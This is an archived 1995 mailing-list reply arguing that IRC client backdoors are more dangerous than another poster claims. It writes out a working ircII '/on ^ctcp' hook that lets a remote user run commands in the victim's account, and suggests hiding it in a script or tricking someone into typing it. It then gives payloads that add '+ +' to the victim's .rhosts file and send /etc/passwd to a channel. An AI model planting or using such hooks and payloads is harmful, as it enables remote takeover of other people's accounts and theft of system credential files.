On Fri, 3 Feb 1995, Silicon Avatar wrote: > On Fri, 3 Feb 1995, Lorna Leong wrote: > > > > > Hi, > > > > I read somewhere that there is a security loophole in IRC. I don't know > > anything else about it but I would like to find out more information > > about this. I heard that information about this IRC loophole can be found > > by FTP at ftp.cert.org, but I couldn't find anything relevant there. > > If you are talking about the "jupe" or "grok" hole. It was temporary, and > merely hacked version of the client floating around at "trusted" sites. > > To my knowledge, these "hacks" have been removed and are no longer a threat > (unless someone is propogating these older clients.) > > Simply put, you could "CTCP grok [command]" (CTCP being a method of > communication over IRC) someone, and have that command executed, > unknowingly, off the account. No, IRC holes are a more serious threat than you give then credit for. For example, if I were to add to a script (or better yet make someone type) the following: /on ^ctcp "% % JUPE" $3- They would be just as much in my control as if they were on a hacked client. from this, you can do: /ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts or /ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd Theres more to IRC backdoors than making people say stupid stuff on a channel. I hope this example clears that up a little. /dev/kmem - This sig deleted for brevity -